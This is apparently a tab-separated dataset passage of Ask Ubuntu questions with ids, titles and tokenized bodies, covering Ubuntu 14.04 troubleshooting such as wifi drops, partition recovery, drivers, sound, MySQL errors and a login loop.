address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 5.120047 ] rtl8192ce : using firmware rtlwifi/rtl8192cfw.bin [ 5.194147 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 5.194286 ] rtlwifi : wireless switch is on [ 8.897871 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 8.898113 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 11.059263 ] wlan0 : authenticate with < mac address removed > [ 11.079193 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 11.080713 ] wlan0 : authenticated [ 11.082910 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 11.085949 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=2 ) [ 11.086080 ] wlan0 : associated [ 11.086087 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 11.130630 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=2 ) [ 11.161112 ] wlan0 : authenticate with < mac address removed > [ 11.507939 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 11.509417 ] wlan0 : authenticated [ 11.510494 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 11.517862 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=2 ) [ 11.517993 ] wlan0 : associated [ 19.514761 ] wlan0 : connection to ap < mac address removed > lost [ 20.825705 ] wlan0 : authenticate with < mac address removed > [ 20.845680 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 20.849279 ] wlan0 : authenticated [ 20.853472 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 20.856489 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=2 ) [ 20.856620 ] wlan0 : associated # # # # # # # # # # wireless info end # # # # # # # # # # # # also went into network manager and locked in bssid number in previously blank field . still , i see the wifi icon fluctuating . bssid found through running : cat /var/log/syslog | grep -e etwork -e wlan | tail -n20 which gave me a message : wlan:0 wpa : group rekeying completed with ( bssid number ) [ gtk=ccmp ] edit/follow up : per @ wild man'comment : i found the only thing i could or needed to change was `` ignore '' in ipv6 . following that i ran the commands provided in his answer on the linked thread . after doing so , i was not able to re-connect via wireless until i rebooted , and then it takes a long time to open up start page . i am now online , but my wifi icon/network is still fluctuating . here 's an output of grep -r [ [ : alnum : ] ] /sys/module/rtl8192ce/parameters /sys/module/rtl8192ce/parameters/ips : n /sys/module/rtl8192ce/parameters/debug:0 /sys/module/rtl8192ce/parameters/fwlps : y /sys/module/rtl8192ce/parameters/swenc : y /sys/module/rtl8192ce/parameters/swlps : n edit 2 tried removing parameters with : sudo rm /etc/modprobe.d/rtl8192ce.conf afterwards my readout with : grep -r [ [ : alnum : ] ] /sys/module/rtl8192ce/parameters /sys/module/rtl8192ce/parameters/ips : y /sys/module/rtl8192ce/parameters/debug:0 /sys/module/rtl8192ce/parameters/fwlps : y /sys/module/rtl8192ce/parameters/swenc : n /sys/module/rtl8192ce/parameters/swlps : n so i ran : sudo modprobe -rv rtl8192ce sudo modprobe -v rtl8192ce fwlps=0 which did set fwlps to : n. however i was disconnected fully until reboot .
486351	how do i start a program later if i unlock it from the launcher on the left ?	i 'm a newbie from windows xp . in winxp if i deleted a program 's icon from the desktop i could always find and start the program later from the start > programs menu . is there an equivalent in ubuntu ? 14.04 is so far just wonderful . will be great when someone gets flash to work as it should and a few other things .
486352	thunderbird opens https links in chromium , instead of default browser	i 've set the following data in thunderbird 's config editor : network.protocol-handler.app.http ; x-www-browser network.protocol-handler.app.https ; x-www-browser as soon as i did this , http : links are opened with x-www-browser ( which currently links google chrome ) , but https : links are still opened in my old default browser , chromium . how can i fix this ?
486354	ubuntu dvd startup 'fixes ' partition table - wrongly assumes raid - corrupts disk partitions	testdisk deep search is unable to detect the correct partition table for /dev/sdb , after starting the pc from dvd ( ubuntu 14.04 ltc trusty tahr - release amd64 ( 20140417 ) ) , and experiencing the following invasive action right at the beginning of the dvd startup : unable to open '/dev/dm-0' the disk contains an unclean file system ( 0 , 0 ) . the file system was n't safely closed on windows . fixing . the disk contains an unclean file system ( 0 , 0 ) . the file system was n't safely closed on windows . fixing . the disk contains an unclean file system ( 0 , 0 ) . the file system was n't safely closed on windows . fixing . unable to open '/dev/sdb' the disk contains an unclean file system ( 0 , 0 ) . the file system was n't safely closed on windows . fixing . unable to open '/dev/sdd' /init : line 7 : ca n't open ? ? ? ? ? ? ( my edit : maybe /dev/sr0 ) : no medium found generating locales ... my guess is that /dev/dm-0 refers to /dev/sdc , because it was the only drive to have 3 partitions at that point , and there are 3 file system fixes listed for this drive . /dev/dm-0 ( shown as /dev/sdc by testdisk ) is also a designation for part of a raid volume , of which /dev/sdb is the second drive in what ubuntu ( wrongly ) thought is an active raid array . this /dev/dm-0 designation is a wrong carry-over from a botched intel rapid storage driver installation that happened when windows was installed the first time , this intel driver tried to pair 2x 1.5 tb drives ( /dev/sdc & /dev/sdb ) together in a raid array without warning . windows was promptly reinstalled without this intel driver and the partition table of /dev/sdb was recovered after the install with testdisk , this was more than a year ago . the pc worked fine since then with windows 7 , until i tried to start an ubuntu dvd simply to try ubuntu today . how unfortunate that it would overwrite partition tables and filenames right at startup , without even a hint of a prompt or agreement from my side . the current drive configuration in the pc is as follows : disk /dev/sda - 1500 gb / 1397 gib - samsung hd154ui disk /dev/sdb - 1500 gb / 1397 gib - st31500341as disk /dev/sdc - 1500 gb / 1397 gib - st31500341as disk /dev/sdd - 200 gb / 186 gib - st3200826as /dev/sda : [ 1397.26 gib ntfs ( healthy , primary ) ] /dev/sdb : should be [ 1251 gb ntfs ] [ 249 gb ntfs ] , but currently is offline [ 774.57 gib ] [ 390.63 gib ] [ 232.07 gib ] /dev/sdc : [ 774.57 gib ntfs ( healthy , primary , active ) ] [ 390.63 gib ntfs healthy , primary ] [ 232.07 gib unallocated ] /dev/sdd : [ 100 mib ntfs ( healthy , system , primary , active ) ] [ 186.21 gib ntfs ( healthy , boot , primary ) ] the approximately correct partition table of /dev/sdb , the drive i want to recover , is as follows , although i 'm not 100 % sure : disk /dev/sdb - 1500 gb / 1397 gib - chs 182401 255 63 partition start end size in sectors 1 * hpfs - ntfs 0 32 33 152106 139 33 2443599146 [ piet ] ( 1251 gb ) 2 p hpfs - ntfs 152107 0 1 182400 254 63 486673110 [ files ] ( 249 gb ) it could also maybe be , although in that case partition # 2 was never seen or used , and i only want to recover partition # 1 and # 3 . disk /dev/sdb - 1500 gb / 1397 gib - chs 182401 255 63 partition start end size in sectors 1 * hpfs - ntfs 0 32 33 x x x 1956926036 [ piet ] ( 1002 gb ) 2 p hpfs - ntfs x x x 152106 139 33 486673110 [ ? ] ( 249 gb ) 3 p hpfs - ntfs 152107 0 1 182400 254 63 486673110 [ files ] ( 249 gb ) a testdisk quick search reveals the following partition table for /dev/sdb : disk /dev/sdb - 1500 gb / 1397 gib - chs 182401 255 63 partition start end size in sectors 1 * hpfs - ntfs 0 32 33 10113 179 58 1624389632 [ francois files ] ( 831 gb ) 2 p hpfs - ntfs 101113 179 59 152106 139 33 819200000 ( 419 gb ) 3 p hpfs - ntfs 152107 0 1 182400 254 63 486673110 [ files ] ( 249 gb ) ( ntfs , blocksize=4096 , 831 gb / 774 gib ) ( ntfs , blocksize=4096 , 419 gb / 390 gib ) ( ntfs , blocksize=4096 , 249 gb / 232 gib ) after testdisk deep search the following is displayed for /dev/sdb : disk /dev/sdb - 1500gb / 1397 gib - chs 182401 255 63 the harddisk < 1500 gb / 1397 gib > seems too small ! < < 1749 gb / 1629 gib > check the harddisk size : hd jumpers settings , bios detection ... the following partitions ca n't be recovered : partition start end size in sectors fat16 lba 155655 200 54 186533 126 25 496050380 ( 253 gb ) hpfs - ntfs 182400 254 63 212694 254 62 486673110 after pressing [ enter ] the following deep search result for /dev/sdb is shown , but it is wrong . disk /dev/sdb - 1500 gb / 1397 gib - chs 182401 255 63 partition start end size in sectors hpfs - ntfs 0 32 33 10113 179 58 1624389632 [ francois files ] ( 831 gb ) hpfs - ntfs 0 32 33 182401 35 34 2930272256 [ francois files ] ( 1500 gb ) hpfs - ntfs 101113 179 59 152106 139 33 819200000 ( 419 gb ) hpfs - ntfs 152107 0 1 182400 254 63 486673110 [ files ] ( 249 gb ) ( ntfs , blocksize=4096 , 831 gb / 774 gib ) ( ntfs found using backup sector , blocksize=4096 , 1500gb / 1397 gib ) ( ntfs , blocksize=4096 , 419 gb / 390 gib ) ( ntfs , blocksize=4096 , 249 gb / 232 gib ) when [ p ] is pressed for each listed partition , the files that are shown for partition # 1 [ francois files ] , and partition # 3 [ 419 gb ] are exactly the files that are on the two partitions as they appear on the other 1.5tb drive /dev/sdc , so the filenames and foldernames were also copied from /dev/sdc to /dev/sdb by the ubuntu dvd , like the partition table , which was completely invasive and undesired . partition # 2 [ francois files ] ( 1500 gb ) can not find a valid file system , and partition # 4 [ files ] actually shows the correct files for the correct partition , so now only the first correct partition must be recovered . please take note of the partition table of the other 1.5tb drive , /dev/sdc , and notice how the ubuntu dvd copied this partition table of /dev/sdc to /dev/sdb . but , not only was the partition table copied to /dev/sdb , but also the file names and folders ( mft ? ) . disk /dev/sdc - 1500 gb / 1397 gib - chs 182401 255 63 partition start end size in sectors 1 * hpfs - ntfs 0 32 33 10113 179 58 1624389632 [ francois files ] ( 831 gb ) 2 p hpfs - ntfs 101113 179 59 152106 139 33 819200000 ( 419 gb ) ( ntfs , blocksize=4096 , 831 gb / 774 gib ) ( ntfs , blocksize=4096 , 419 gb / 390 gib ) i am desperate to recover the exact partition table of /dev/sdb , in particular the first partition as it was before i started the ubuntu dvd , which was a truly regrettable action of which i never would 've imagined it would do something so invasive without even a prompt , right at the startup . luckily i had the presence of mind to take a photo with my cellphone when i saw the 'fixing ' messages as the dvd booted up . is it possible to try something more than the testdisk deep search to try and recover the partition table ? i feel that this question is appropriate for askubuntu , because it very much pertains to how ubuntu tried to fix a partition table , under the wrong assumptions due to an incorrect disk designation . maybe we can get an answer as to the exact process or program that was used in the ubuntu dvd startup that fixes disk issues . testdisk.log screenshots
486355	wacom tablet - xsetwacom area command causes no change	i 've been trying to use the xsetwacom -- set 16 area command to change the area that my wacom intuos tablet can operate on ( 16 is the stylus device ) . when i plug in the tablet the default area is xsetwacom -- get 16 area 0 0 15200 9500 i used the command xsetwacom -- set 16 area 0 0 7510 4750 ideally to reduce the dimensions in which the tablet can move the cursor by a factor of 2 . but no change occurs and the tablet can still affect my entire screen . if it matters : xsetwacom -- version 0.24.0
486358	qt platform plugin `` windows '' missing	i am trying to run teamspeak3 and i had to try and use the windows version because i keep running into problems with the linux one . i downloaded and installed teamspeak 3 fine , but whenever i try to run it with wine i get the error saying the qt platform plugin `` windows '' is missing .
486361	no root account , ca n't boot into recovery	i recently dug an old dell inspiron 530s thin client out of a storage room , in hopes of getting it up and running to use at my desk . however i found that xp had screwed up and there were several sector read errors . i did n't want xp anyways and i decided to install ubuntu by way of wubi . i ran the wubi installer and set a username and password in the installer . this was all great until i decided to start up ubuntu and found that they user name i had created did not exist ! so , much more research went into the issue and i found that i could access the root account if i could boot into recovery , something i was rather familiar with from previous issues . although this time , it did n't want to go into recovery . it pulled up a screen in which many lines of text spewed across , loading mouse , loading key board , etc . but when it was about to launch into recovery mode , it stopped , and started to load ubuntu as normal . i have tried to boot into recovery several times and i have n't been able to get it . what would be my next steps in attacking the problem , i have an ubuntu disk , but for some reason it never worked when i tried to boot from it . giving an error that means you have to change some directory names , something i found to be common with usb installs . i currently have ntldr on the mbr , although i would like to have grub2 . if all else fails , i will just download ubuntu server distro and install it . i normally use ubuntu server distro for my desktops anyway due to the versatility and customization that the desktop distro does n't offer .
486363	having trouble installing softwares on my ubuntu 12.04	i tried downloading code : :blocks ide on my ubuntu 12.04 . but every time i try - sudo apt-get install codeblocks this error shows up : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_universe_i18n_translation-en e : the package lists or status file could not be parsed or opened . this is happening for pretty much all the softwares and my software center is n't working properly either . i use hp probook 4540s . any advice on what i should do to solve this issue ?
486365	any app/gui to manage a huawei usb dongle ?	currently using a huawei usb dongle which works perfectly out of the box with 14.04 . only thing i need now is a linux version of the gui which enables users to send messages , make calls et al . anything like that out there ?
486367	what is the current status of support for optimus graphics cards ?	i will make a clean install of ubuntu 14.04 on my machine in a bit . will i have to install optimus / will the system auto-install it / is there a better option than optimus available at this time ?
486368	icons hiding in nemo	i have encountered problem with icons visibility in file manager - icons are hiding/showing after mouse hover ( randomly ) . i am attaching screenshot . could somebody advise me what to do to fix this issue ? thanks in advance for your response .
486370	wireless connection hp pavillon dv6 not working	i 'm trying without results to connect to my wireless network with the hp pavillon dv6 but ca n't get it working . have n't tried the ethernet port yet . i just installed ubuntu 14.4 lts today . how can i know if my wireless adapter is working properly ? specs : intel core i7-2760qm , intel sandbridge mobile
486371	how to `` ping '' from my ubuntu linux server to a pc with windows 8 ?	when you can give me a solution would greatly appreciate it , i have my tower server with linux ( ubuntu 14.04 ) and i have tried my server ping the pc where i installed a program . net and i need you on the server saving files necessary for enrollment in my school , my pc with windows 8 pinging the server but the server does not ping my pc and add exceptions in the firewall on both machines and even haci no pings and makes it impossible for my enter the program database mysql this check in linux , i appreciate any help , thanks !
486379	how do you setup bsnl broadband connection in ubuntu 14.04	the modem doesnt seem to be detected using the command sudo pppoeconf . could you please suggest an alternative ?
486380	chmod ubuntu desktop fail	i accidentally did chmod 667 on /home/user/desktop/ and now it is behaving strangely . how can i reverse the damage i have done ?
486382	how do i mount a blank cd in xubuntu ?	blank cds do not mount in xubuntu ( ubuntu 14.04 ) . cds with content do mount . i have a /media/cdrom0 directory and a /media/cdrom but when i enter this command : ~ $ mount /media/cdrom0 i get : mount : ca n't find /media/cdrom0 in /etc/fstab or /etc/mtab any help is greatly appreciated .
486391	command to open a document	what 's the command that , given a document name , will open it with the right application ( i.e . an equivalent to windows start / mac os x open )
486395	canon pixma mg6150 -ubuntu 14.04	i am a complete novice as far as ubuntu linux having moved to it when windows xp was no longer supported . i find it so much faster but also very frustrating as i do n't know how to do some things . my main problem is printing and scanning with my canon pixma mg6150 . when i upgraded to 14.04 i installed the gutenprint driver and the printer works but only prints in black . i have today successfully installed the canon drivers for printing but it still tries to use the gutenprint . how do i uninstall the gutenprint and link to the canon drivers ? will the canon drivers print good quality photos ?
486400	access to wifi jvc adixxion camera	i do n't know how to get streaming video from the camera . it is recognized , establish the connection but ... then what ? i 'm not an advanced user there is an application included ( wi-video ) but only for windows/mac : ( some images that might help : https : //app.box.com/s/acnmer6mn7ei5hn10v65 is there a way to to detect it as a webcam ? or use browser to display the streaming ? my system : ubuntu 14.04 64-bit
486404	mimetype mess after calibre installation . how can i fix it ?	i always get text/plain or application/octet-stream when running `` mimetype '' on all file types . the command `` file -- mime-type '' seems to identify correctly the different file types . for instance , if i run it on a pdf file , i get filename.pdf : application/pdf but if i try to run `` mimetype '' on the same pdf file , i get filename.pdf : text/plain similarly , if i run `` file -- mime-type '' on a mp3 file , i get filename.mp3 : audio/mpeg but if i try to run `` mimetype '' on the same mp3 file , i get filename.mp3 : application/octet-stream as a consequence , i can not open some files with the suitable application . for example . i can not open a pdf file with evince . and i can not set the `` open with '' option of nautilus to open each file-format with the suitable application . i have tried to run sudo update-mime-database /usr/share/mime but it does not fix the problem . i have noticed that , if i run `` mimetype '' as the first user , i get this message warning : you do n't seem to have a mime-info database . the shared-mime-info package is available from http : //freedesktop.org/ however the shared-mime-info package seems to be correctly installed .
486405	is chmod out-of-place ?	i try to chmod some files and i get the error `` disk quota exceeded '' : it 's true that i do n't have that much space remaining in the filesystem where i use chmod , namelynfs-prod-1.csail.mit.edu : /export/evodesignopt/beatdb ( which is an nfs ) , either in terms of bytes or in terms of inodes : but why does chmod need more space ? i use ubuntu 12.04 .
486406	dummy output ; i need to re-install alsa-base and pulseaudio every time [ 14.04 ]	i have a strange problem about sound . dummy output is a well known issue for sound problems . that is ok . i searched all over the askubuntu and internet . found some solutions . it works . after applying them i got sound back . but the real problem is i have to do this every time i start my computer . i boot , hear the login screen sound , log in , then no sound . it 's dummy output written in the sound settings . then i open terminal , write these ; sudo apt-get remove -- purge alsa-base sudo apt-get remove -- purge pulseaudio sudo apt-get install alsa-base pulseaudio ubuntu-desktop sudo alsa force-reload then reboot . voila ! sound comes back . as you see here i have to start my computer two times for getting a proper working sound option . i tried another solutions like run=no in speech-dispatcher . but it 's still the same . i need to do this things all over for every start . any suggestions ? that is a ideapad z570 laptop i 'm using . and ubuntu is installed alongside windows 7 . other than this everything is working fine and i have a rock solid ubuntu 14.04 in my laptop . thanks . any help will be appreciated .
486409	/etc/network/interfaces file empty	i do n't know what i did but my network manager does n't start up and my wifi does n't work unless i do it all manually . i 've read that i need to edit /etc/network/interfaces file but when i look for it , only the interfaces.bak file exists . so i type sudo gedit /etc/network/interfaces and it opens but it 's blank . is this why my internet is all screwy ? and how can i fix it ? i also get a bunch of ndiswrapper errors on boot and it takes forever trying to setup the network configuration which it never does .
486410	eclipse kepler hangs showing only the splash screen while starting first time	i am using kepler to the ubuntu 14.04 first time . while i start the eclipse it shows the splash screen only and hang on it . how to overcome from this problem ?
486411	problem using comm.jar with 32 bit jdk	i get a java.lang.noclassdeffounderror : javax/comm/commportidentifier error when i try to run a compiled java program that uses comm.jar and its associated .so and .properties files . compilation runs without any error . i use comm.jar 3.0 , 32 bit jdk on 32 bit ubuntu 14.04 on intel pentium with pae . what can i do to resolve this issue ?
486418	passing parameters to the installer for 14.04	the installer for 14.04 gave me no chance ( that i took notice of ) to pass parameters . i would have liked to use the mode `` priority=medium '' in order to control the software packages loaded . ( as is , the default installer loaded no multi-desktop environment , no compilers , debuggers , etc ... ) so i will re-install it again . and i would like to know how i can set `` priority=medium '' and possibly pass other parameters to the installer . thank you for helping .
486421	14.04 - user accounts applet not working	when i try to open up the user accounts applet ( either by using the icon in system settings or by searching for it , it does not load . when doing it via system settings the window locks up . when trying to search for it nothing appears to happen . i have tried rebooting and reinstalling user accounts but the issue persists . edit : i found out that it does eventually load , only after a long delay ( greater than a few minutes but less than 4 hours ) .
486422	where can i download the newest boot repair disk ?	i have a boot repair disk for ubuntu 12.04 and i 'm about to install ubuntu 14.04 but i 'd like to make sure that i have the latest boot repair disk before doing so . where can i download the most recent boot repair disk ?
486423	can not find windows 7 after installing ubuntu	is there a solution to this ? gparted gives me thanks a lot . best regards .
486426	data error in boot\grub ... file broken	so i am trying to make my usb stick bootable and load ubuntu 14.04 64 bit on it . i have tried different methods , for example , i format my usb on windows to be fat32 and then am using the universal usb installer loading iso file into it . however , i am getting 192 errors ! which most of the look like data error in boot\grub\x86_64-efi*.mod . file is broken . i also have boot the usb stick in different format , but still no success . i appreciate any comment .
486429	not able to boot in ubuntu 14.04	i am pretty new to ubuntu , 2 days back i installed ubuntu 12.04 in widows . i was told that 12.04 is very obsolete version . so i deleted ( literally ctrl+shift+del ) ubuntu directory and downloaded and installed ubuntu 14.04 . now the problem is when i start the computer , i see a prompt whether i want to boot in windows or ubuntu , but when i select ubuntu it shows some error message - obviously since i have deleted the files . but i am not able to see the prompt for ubuntu 14.04 . please help . if you need more information regarding this i 'll give it in comments .
486430	is there a login theme like mac for my ubuntu 12.04 lts ?	i have ubuntu 12.04 lts and i just want a link to a website which has this kind of login theme for ubuntu .
486433	i cant mount my tizen device	i 'm trying to take an image of my tizen device on ubuntu , but ubuntu cant mount it neither can it be listed as one of the devices that is connected to the computer on the terminal even though its existed on the devices list .
486434	mascarade_des_rythmes permission	i got you do not have permission necessary to read contents of mascarade_des_rythmes when i click on cd/dvd driver on the ubuntu files . i tried to mount cd/dvd rom , but i tried to use wodim -- devices then i got wodim : no such file or directory . can not open scsi driver ! for possible targets try 'wodim -- devices ' or 'wodim -scanbus ' . for possible transport specifiers try 'wodim dev=help ' . for ide/atapi devices configuration , see the file readme.atapi.setup from the wodim documentation . i go to /cdrom , but there is files on the directory . i tried to access cd/dvd on my ubuntu machine , but not successful . any information and help is great appreciated , regards , iccsi
486435	unknown job : mysql ( ubuntu 14.04.1 )	apt-get install mysql-server ... setting up mysql-server-5.5 ( 5.5.37-0ubuntu0.14.04.1 ) ... initctl : unknown job : mysql then : grep -i error /var/log/mysql/error.log error : 1064 you have an error in your sql syntax ; check the manual that corresponds to your mysql server version for the right syntax to use near 'alter table user add column show_view_priv enum ( 'n ' , 'y ' ) character set utf8 not ' at line 1 140621 14:09:12 [ error ] aborting error : 1050 table 'plugin ' already exists 140621 14:09:17 [ error ] aborting
486436	logging into a lxc container	trying to create lxc container to run 32bit wine on my 64bit machine . i have done all as instructed . then coming to the part , where to start the container : sudo lxc-start -n my32bitbox after a while of starting , it prompts for user name and password . in the install instructions it says that own user name and password can be used , but i get incorrect login . also same error when trying in with default login , username : ubuntu password : ubuntu . any suggestions ?
486438	cant mark minecaft as executeable in xubuntu 14.04	i cant mark minecraft as executeable , i try rightclicking minecraft and starting it up with java 7 , but i need to mark it as executeable , if i go to `` properties '' and go to `` permissions '' it does not have a checkbox where i can mark it , i have tried doing the command : `` chmod a+x minecraft.jar '' but it just says : `` chmod : can not access ‘minecraft.jar’ : no such file or directory '' how to i mark it ?
486442	14.04 wifi disconnect reason 2	ubuntu 14.04 hw : rt2860 ( i 'm sure since is my eeepc 1000he ) but seen from ubuntu as rt2890 lspci : 01:00.0 network controller : ralink corp. rt2790 wireless 802.11n 1t/2r pcie module : rt28000pci it 's a wep connection , it connect just for a couple of minutes , then disconnect with reason 2 , here just a few lines from dmesg . [ 238.999880 ] wlan0 : authenticate with e0:91:53:25:0b : f1 [ 239.012788 ] wlan0 : send auth to e0:91:53:25:0b : f1 ( try 1/3 ) [ 239.019096 ] wlan0 : authenticated [ 239.019814 ] rt2800pci 0000:01:00.0 wlan0 : disabling ht/vht due to wep/tkip use [ 239.019836 ] rt2800pci 0000:01:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 239.019850 ] rt2800pci 0000:01:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 239.020176 ] wlan0 : associate with e0:91:53:25:0b : f1 ( try 1/3 ) [ 239.022206 ] wlan0 : rx assocresp from e0:91:53:25:0b : f1 ( capab=0x431 status=0 aid=17 ) [ 239.023239 ] wlan0 : associated [ 239.023345 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 239.063810 ] wlan0 : deauthenticated from e0:91:53:25:0b : f1 ( reason : 2 ) [ 240.025701 ] wlan0 : authenticate with e0:91:53:25:0b : f1 [ 240.028223 ] wlan0 : send auth to e0:91:53:25:0b : f1 ( try 1/3 ) [ 240.032416 ] wlan0 : authenticated with open networks it works without problems , i 'll check with wpa as soon as i can . any idea ?
486444	how do you change keyboard layouts from the login screen in xubuntu ?	i 've set up multiple user accounts in xubuntu 14.04 . i ( the admin ) am a dvorak user so i have english us dvorak as the default layout , but the other user is a qwerty user . i 've added english us standard as an optional layout from within my account , and as the only layout from within the other user 's account . however , dvorak seems to be the only layout ever available at the login or lock screen page ( no matter who 's account is selected , who was last logged in , etc ) . there 's a drop-down menu that lists english us , english uk , english canada , etc , at the login screen , but they all seem to be set to dvorak . how do i add an option to switch between the two layouts at the login screen ?
486447	problems with sound on samsung np550p5c	i have two problems : i am unable to use 4-channel audio when viewing the movies with vlc . when checking the sound is also only two front channel played from all 4 . and also closed the subwoofer . this is a problem similar to this issue : subwoofer not working in dell inspiron 7720 can anybody help ? my data : my notebook is samsung np550p5c $ uname-a linux samsung-np550-u 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86-64 x86-64 x86-64 gnu/linux $ lspci | grep audio 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family ) high definition audio controller ( rev 04 ) $ cat /proc/asound/card0/codec* | grep codec codec : realtek alc269vc codec : intel pantherpoint hdmi
486448	lenovo g780 no ethernet ( qualcomm atheros ar8162 ) on 14.04	first of all , i want to say i have been struggling with this issue for more than a year , you may think this is a duplicate , but it 's not as none of the solutions worked for me , i 'll try to be as informative as possible to describe the issue . tl ; dr no ethernet on eth0 , even after installing alx driver . story i have bought this laptop in the fall of 2012 , for my work i needed only windows so i read multiple reviews about how this laptop is working and did n't think of the possible issues with linux and did n't google about it . windows was working almost without issues but that 's another story - network was fine . at the beginning of 2013 i tried to install some linux , if i recall correctly , it was ubuntu 12.10 . the problem was that it had no network available at all - neither wireless , nor wired , i googled a couple of days trying to fix that , but with no success - it was almost impossible to do anything because i had to reboot after every unforeseen error/missing libraries . same problem was present on linux mint ( v16 i think ) and fedora . i have tried the same some time after , and again , with no success . now when the 14.04 launched , i thought i should give it a try and after installing ubuntu 14.04 i was happy to see wifi working while installing , i saw wired connection did n't work but what the hell . i reinstalled to kubuntu to see the same thing . after running all apt-get update , apt-get upgrade and allowing the system to find all the drivers it could i was quite unhappy that wired still did n't work . i tried to google , but almost all information was outdated as everyone refered to compat drivers , that are unavailable at trusty backports repository . downloading them and trying to compile resulted in errors . i tried installing wicd but it could n't connect as well . finally i found a thread on reddit ( ! ) that i could go through without errors . but after entering modprobe alx nothing changed . neither anything changed after rebooting . neither anything changed after performing everything the second time on a completely clean system after a full reinstall of kubuntu . it simply says `` connecting '' in the network manager for some time then timeouts . wicd did show `` obtaining ip address '' and was stuck on that too . on the copy-paste of ifconfig ( below ) , you may see that some packets/bytes are sent/received , i ca n't say for sure , but i think there were none before installing the alx driver . i 'm really desperate and looking forward to try anything to get this fixed as sometimes i 'm only able to connect using wired connection . i googled a lot , really , read and tried every solution in at least 20 threads , even the outdated ones . machine lenovo g780 , kubuntu 14.04 $ uname -a linux kubi 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux $ lspci -nn | grep '0200\|0280' 02:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8162 fast ethernet [ 1969:1090 ] ( rev 08 ) 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) $ ifconfig eth0 link encap : ethernet hwaddr b8:88 : e3:71:93:09 inet6 addr : fe80 : :ba88 : e3ff : fe71:9309/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:872 errors:0 dropped:0 overruns:0 frame:0 tx packets:595 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:99133 ( 99.1 kb ) tx bytes:113073 ( 113.0 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:6183 errors:0 dropped:0 overruns:0 frame:0 tx packets:6183 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:720980 ( 720.9 kb ) tx bytes:720980 ( 720.9 kb ) wlan0 link encap : ethernet hwaddr 08 : ed : b9:9e : d3:27 inet addr:192.168.1.105 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :aed : b9ff : fe9e : d327/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:129296 errors:0 dropped:0 overruns:0 frame:192606 tx packets:83848 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:174198556 ( 174.1 mb ) tx bytes:8251504 ( 8.2 mb ) interrupt:17 screenshot from the same machine , same connections on windows ( using wired , wifi turned off ) : if any other info may help i would be more than glad to post it . update 1 i have connected to the router with a cable and it works , but not with bypassing the router . i do n't see what the reason is now . it 's not mac filtering as the mac on windows and linux is the same .
486450	how to connect to smb : // ... ?	i would like to connect from ubuntu 14.04 to a file server ( e.g. , `` smb : //files.myuni.ca '' ) . i opened files and then chose `` connect to server '' . a minimalistic menu pops up . if i provide the server address and hit `` connect '' , the window disappears , but nothing seems to happen . how can i get a connection ? i also tried the idea on how do i connect to an smb share requiring a user name and password ? but that did not work either .
486454	stuck at ubuntu login screen	when i try to log in to my account the screen turns black for a second then goes back to the login screen . apparently this is a fairly common problem but nothing i 've tried from past questions on this site has worked so far . what i 've tried : using gdm instead of lightdm sudo apt-get upgrade and sudo apt-get update restoring .bashrc to its default version chown username : username .xauthority reinstalling ubuntu-desktop creating a new login account ( it just does the same thing ) things that may or may not be helpful : when i cntl+alt+f2 and do the textual login , i get a bunch of errors : command 'lesspipe ' is available in the following places * /bin/lesspipe * usr/bin/lesspipe the command could not be located because 'usr/bin : /bin ' is not included in the path environment variable . lesspipe : command not found command 'dircolors ' is available in '/usr/bin/dircolors' the command could not be located because '/usr/bin ' is not included in the path environment variable . dircolors : command not found command 'uname ' is available in '/bin/uname/' the command could not be located because '/bin ' is not included in the path environment variable . uname : command not found -bash : [ : = : unary operator expected command 'sed ' is available in '/bin/sed' the command could not be located because '/bin ' is not included in the path environment variable . sed : command not found command 'ls ' is available in '/bin/ls' the command could not be located because '/bin ' is not included in the path environment variable . ls : command not found i can not use most of the commands like ls and sudo until i export /bin and /usr/bin to the path . when i do `` ls -ltr '' in /var/log , the last log files modified are : syslog wtmp auth.log lastlog xorg.0.log lightdm ( directory ) xorg.0.log.old i could n't find any obvious error messages in any of them . can anyone help me to diagnose the problem ? edit : here is auth.log : jun 21 13:36:25 melissa-thinkpad-t430 sshd [ 551 ] : server listening on 0.0.0.0 port 22 . jun 21 13:36:25 melissa-thinkpad-t430 sshd [ 551 ] : server listening on : : port 22 . jun 21 13:36:35 melissa-thinkpad-t430 lightdm : pam_unix ( lightdm : session ) : session opened for user lightdm by ( uid=0 ) jun 21 13:36:35 melissa-thinkpad-t430 